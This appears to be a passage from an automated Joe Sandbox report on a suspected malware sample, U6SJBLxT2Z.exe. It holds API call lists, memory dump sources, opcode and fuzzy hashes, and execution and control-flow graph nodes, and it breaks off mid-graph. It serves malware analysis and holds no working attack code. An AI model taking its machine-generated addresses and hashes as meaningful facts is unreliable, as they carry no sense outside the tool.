                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                  • API String ID: 3248276644-3355392842
                                                                                                                                                                                                  • Opcode ID: d647ba489e44e4c384e8f234fc99267bc74e37b9af3ba258ec0477dc6db0c33a
                                                                                                                                                                                                  • Instruction ID: 87735b5e832f2f8e04389b482ed260ad6458a913df04a2d72dce2697f876d431
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d647ba489e44e4c384e8f234fc99267bc74e37b9af3ba258ec0477dc6db0c33a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5F0F435104D2216C63233369D09AAF1548CE82364759453BF8D1B22D1DB3C8B838CED
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0040541C
                                                                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 0040546D
                                                                                                                                                                                                    • Part of subcall function 004043B3: SendMessageW.USER32(00010416,00000000,00000000,00000000), ref: 004043C5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                                                                                  • Opcode ID: 26e100c8e936244900aacf90f380f9ed614629df6b7f9272593e4765ff02ca63
                                                                                                                                                                                                  • Instruction ID: 5278ea034fccd8c5818adddfb220a11f4cbf18c481ac084eeec191c980f5e464
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26e100c8e936244900aacf90f380f9ed614629df6b7f9272593e4765ff02ca63
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9012C71200609AFDF216F11DD80BDB3B66EB84756F504036FB01752E2C77A8C92DA6E
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,0040656E,80000002), ref: 00406325
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,0040656E,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll), ref: 00406330
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseQueryValue
                                                                                                                                                                                                  • String ID: Call
                                                                                                                                                                                                  • API String ID: 3356406503-1824292864
                                                                                                                                                                                                  • Opcode ID: d70c3446bea39a9e955728d1e3d97a4cd4df477861c945fcd5c6f0c2612e0d48
                                                                                                                                                                                                  • Instruction ID: 844154995e22508991f9c2085a3ddc533437a0a8a5a4e2329c4a16b7f523fd8f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d70c3446bea39a9e955728d1e3d97a4cd4df477861c945fcd5c6f0c2612e0d48
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF017172500209EBDF218F55CD05EDB3BA9EB54394F05803AFD5592150E738D964DBA4
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,75D43420,00000000,C:\Users\user\AppData\Local\Temp\,00403A23,00403839,?,?,?,00000009,?), ref: 00403A65
                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00403A6C
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A4B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                  • API String ID: 1100898210-3355392842
                                                                                                                                                                                                  • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                                                  • Instruction ID: 631b6d606f958dd3b9f901d17eba749f6bbdc97bd5f3e27fdad90cb16f3fbd8e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CE0EC3261212097C7219F55BE08B6E7768AF48B22F06146AE9C5BB2608B745D424FD8
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\U6SJBLxT2Z.exe,C:\Users\user\Desktop\U6SJBLxT2Z.exe,80000000,?,?,?,00000009,?), ref: 00405D38
                                                                                                                                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\U6SJBLxT2Z.exe,C:\Users\user\Desktop\U6SJBLxT2Z.exe,80000000,?,?,?,00000009,?), ref: 00405D48
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CharPrevlstrlen
                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                  • API String ID: 2709904686-3370423016
                                                                                                                                                                                                  • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                                                                                                                                                  • Instruction ID: cdcea1fdb6b733c318131938d2018cbcd3f5257763d90021158e822df2c29c6c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FCD05EB24009209AC3126704DC0999F67A8FF5130078A842BF541AA1A4D7785C818AAC
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6F77116A
                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6F7711C7
                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6F7711D9
                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6F771203
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11940201311.000000006F771000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F770000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940166905.000000006F770000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940233617.000000006F774000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940257605.000000006F776000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6f770000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1780285237-0
                                                                                                                                                                                                  • Opcode ID: 631bc42356b2bb52e81b30b3f40f3a349284bb82804e948d52ef58b80b4312ce
                                                                                                                                                                                                  • Instruction ID: 6305f8cbcac449c4c3c0c25864e8e48b8dc3d2cc9dfc201b8a9a5684f8d3f46d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 631bc42356b2bb52e81b30b3f40f3a349284bb82804e948d52ef58b80b4312ce
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D3194B15242119FDF208F78EA6997577E8FB86324700063BE844DB250EFB4F811C7A0
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E94
                                                                                                                                                                                                  • CharNextA.USER32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EA5
                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EAE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                                                                                  • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                                  • Instruction ID: 346f7042b660fb70b52ae74c1c6e121eab6bc84344666f805f11c7930e864ff2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8F06231505418FFD7029BA5DE0099FBBA8EF56250B2540AAE880F7250D674EF019BA9
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:0%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                  Signature Coverage:20.5%
                                                                                                                                                                                                  Total number of Nodes:122
                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                  execution_graph 59002 328bbe80 133 API calls 59005 3294ba80 23 API calls 59006 3288a290 440 API calls 59007 3288fe90 13 API calls 59123 3288c090 157 API calls 59008 3289c690 GetPEB 59009 328ad690 9 API calls 59010 328b6691 183 API calls 59124 328cb890 310 API calls 59011 3288bea0 144 API calls 59012 328906a0 161 API calls 59126 328900a0 506 API calls 59015 328ccea0 311 API calls 59016 328d22a0 687 API calls 59017 328882b0 134 API calls 59127 3288b0c0 360 API calls 59020 328c32c0 138 API calls 59129 328c6cc0 139 API calls 59132 328bf4d0 145 API calls 59021 3288e2ef 27 API calls 59023 328872e0 132 API calls 59134 328958e0 778 API calls 59024 328b66e0 230 API calls 59025 32893ee2 18 API calls 59136 328c54e0 78 API calls 59137 328bacf0 142 API calls 59138 328bccf0 GetPEB GetPEB 59026 328c62f0 545 API calls 59027 328c96f0 139 API calls 59139 329230ee 156 API calls 59140 328ca4f0 233 API calls 59142 328d100e 137 API calls 59143 3288ec0b 537 API calls 59144 3288640d 500 API calls 59030 32886e00 RtlDebugPrintTimes RtlDebugPrintTimes 59031 328bd600 671 API calls 59033 3288821b 162 API calls 59034 32889610 497 API calls 59147 32892410 546 API calls 59148 32899810 495 API calls 59149 328d2010 9 API calls 59038 328afe2f 7 API calls 59039 3288b620 80 API calls 59151 3288b420 268 API calls 59152 32892022 90 API calls 59042 328d163c 261 API calls 59043 32887a30 265 API calls 59154 3288b830 493 API calls 59046 32892e32 157 API calls 59047 328c6e30 9 API calls 59155 328c0030 132 API calls 59049 328c7a33 691 API calls 59050 32893640 146 API calls 59051 328bea40 165 API calls 59052 328cf240 137 API calls 59158 328a0445 161 API calls 59160 328ac850 496 API calls 59162 328d9450 8 API calls 59058 3288b260 282 API calls 59164 32887060 RtlDebugPrintTimes 59165 32887860 79 API calls 59166 32893c60 18 API calls 59061 328cce70 158 API calls 59063 32891380 146 API calls 59172 328c9580 505 API calls 59068 32913f9f 8 API calls 59174 328afd85 87 API calls 58999 328d2b90 LdrInitializeThunk 59178 32888196 8 API calls 59179 3288e9ac 539 API calls 59181 32887da0 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 59071 328c43a0 160 API calls 59073 328c8fbc 286 API calls 59183 328d15b4 145 API calls 59185 328cb9b0 10 API calls 59186 328a35c9 9 API calls 59077 3288e3c0 198 API calls 59078 3288bfc0 11 API calls 59187 328881c0 78 API calls 59189 32891dc0 18 API calls 59190 328cc5c6 495 API calls 59191 328b1dc0 260 API calls 59079 328c87c0 133 API calls 59080 328cbbc0 250 API calls 59081 32889fd0 133 API calls 59082 32911fc9 530 API calls 59194 3288c1d0 136 API calls 59083 32893bd0 16 API calls 59197 328be9e0 153 API calls 59087 328873f0 6 API calls 59203 328c0100 134 API calls 59204 3291c51d 8 API calls 59205 328c5900 137 API calls 59093 328bcb10 GetPEB GetPEB GetPEB GetPEB 59094 3291330c 135 API calls 59095 3295970b 73 API calls 59096 3289872a 138 API calls 59098 3288bf20 157 API calls 59212 328c1527 138 API calls 59100 328cab20 146 API calls 59101 328ccb20 168 API calls 59214 328c8520 9 API calls 59217 328dad20 9 API calls 59103 328c8322 496 API calls 59220 328ad530 133 API calls 59223 328c8d4f 161 API calls 59224 328e7948 79 API calls 59107 3288a740 219 API calls 59225 3288c140 141 API calls 59228 328ae547 505 API calls 59229 328c415f 261 API calls 59110 328cbb5b 136 API calls 59230 3289b950 252 API calls 59112 328ca350 360 API calls 59232 328c716d 7 API calls 59115 3289b360 13 API calls 59233 32898160 246 API calls 59234 328c7960 136 API calls 59235 3288c170 536 API calls 59117 32891f70 158 API calls 59118 328baf72 263 API calls 59119 328ba370 80 API calls

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 2 328d34e0-328d34ec LdrInitializeThunk
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                  • Opcode ID: e21e453a69480f9eac60d3f837c51bac7525458e981ac36b5c258e6c6e7c959b
                                                                                                                                                                                                  • Instruction ID: ddecdb87d869af69adccd6cc7f60d7ff38ce78f48f9b52e88851920736ec741a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e21e453a69480f9eac60d3f837c51bac7525458e981ac36b5c258e6c6e7c959b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6890023560511402D5006258571470A100547D1201F61CC16A4524529DC7E5895975E2
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 0 328d2b90-328d2b9c LdrInitializeThunk
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                  • Opcode ID: 44635e81f69b25290867d63073e4488cfc41ed737dc9173860505047198d7200
                                                                                                                                                                                                  • Instruction ID: b81f0a5be159345bcdecec6acf9431df4ec0ab3d33ce8a495859d6586b4012bc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44635e81f69b25290867d63073e4488cfc41ed737dc9173860505047198d7200
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF90023520109802D5106258960474E000547D1301F55CC16A8524619DC6E588997161
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1 328d2d10-328d2d1c LdrInitializeThunk
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                  • Opcode ID: d489426499bd4fe27b056b4895e4d2b22ade0b88274a57490b1746ecfc62a997
                                                                                                                                                                                                  • Instruction ID: 53b6010915fc5030cc0f7bf54765c15fd8de3a8896dc9574853a50fd77df7119
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d489426499bd4fe27b056b4895e4d2b22ade0b88274a57490b1746ecfc62a997
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B590023520101413D5116258570470B000947D1241F91CC17A4524519DD6A6895AB161
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 554 32939060-329390a9 555 329390ab-329390b0 554->555 556 329390f8-32939107 554->556 557 329390b4-329390ba 555->557 556->557 558 32939109-3293910e 556->558 559 329390c0-329390e4 call 328d8f40 557->559 560 32939215-3293923d call 328d8f40 557->560 561 32939893-329398a7 call 328d4b50 558->561 568 32939113-329391b4 GetPEB call 3293d7e5 559->568 569 329390e6-329390f3 call 329592ab 559->569 570 3293923f-3293925a call 329398aa 560->570 571 3293925c-32939292 560->571 580 329391d2-329391e7 568->580 581 329391b6-329391c4 568->581 582 329391fd-32939210 RtlDebugPrintTimes 569->582 572 32939294-32939296 570->572 571->572 572->561 576 3293929c-329392b1 RtlDebugPrintTimes 572->576 576->561 588 329392b7-329392be 576->588 580->582 584 329391e9-329391ee 580->584 581->580 583 329391c6-329391cb 581->583 582->561 583->580 586 329391f3-329391f6 584->586 587 329391f0 584->587 586->582 587->586 588->561 590 329392c4-329392df 588->590 591 329392e3-329392f4 call 3293a388 590->591 594 32939891 591->594 595 329392fa-329392fc 591->595 594->561 595->561 596 32939302-32939309 595->596 597 3293930f-32939314 596->597 598 3293947c-32939482 596->598 601 32939316-3293931c 597->601 602 3293933c 597->602 599 32939488-329394b7 call 328d8f40 598->599 600 3293961c-32939622 598->600 616 329394f0-32939505 599->616 617 329394b9-329394c4 599->617 605 32939674-32939679 600->605 606 32939624-3293962d 600->606 601->602 607 3293931e-32939332 601->607 603 32939340-32939391 call 328d8f40 RtlDebugPrintTimes 602->603 603->561 643 32939397-3293939b 603->643 611 32939728-32939731 605->611 612 3293967f-32939687 605->612 606->591 610 32939633-3293966f call 328d8f40 606->610 613 32939334-32939336 607->613 614 32939338-3293933a 607->614 637 32939869 610->637 611->591 618 32939737-3293973a 611->618 620 32939693-329396bd call 32938093 612->620 621 32939689-3293968d 612->621 613->603 614->603 627 32939511-32939518 616->627 628 32939507-32939509 616->628 622 329394c6-329394cd 617->622 623 329394cf-329394ee 617->623 624 32939740-3293978a 618->624 625 329397fd-32939834 call 328d8f40 618->625 640 329396c3-3293971e call 328d8f40 RtlDebugPrintTimes 620->640 641 32939888-3293988c 620->641 621->611 621->620 622->623 636 32939559-32939576 RtlDebugPrintTimes 623->636 634 32939791-3293979e 624->634 635 3293978c 624->635 652 32939836 625->652 653 3293983b-32939842 625->653 630 3293953d-3293953f 627->630 638 3293950b-3293950d 628->638 639 3293950f 628->639 644 32939541-32939557 630->644 645 3293951a-32939524 630->645 646 329397a0-329397a3 634->646 647 329397aa-329397ad 634->647 635->634 636->561 668 3293957c-3293959f call 328d8f40 636->668 648 3293986d 637->648 638->627 639->627 640->561 686 32939724 640->686 641->591 654 329393eb-32939400 643->654 655 3293939d-329393a5 643->655 644->636 649 32939526 645->649 650 3293952d 645->650 646->647 658 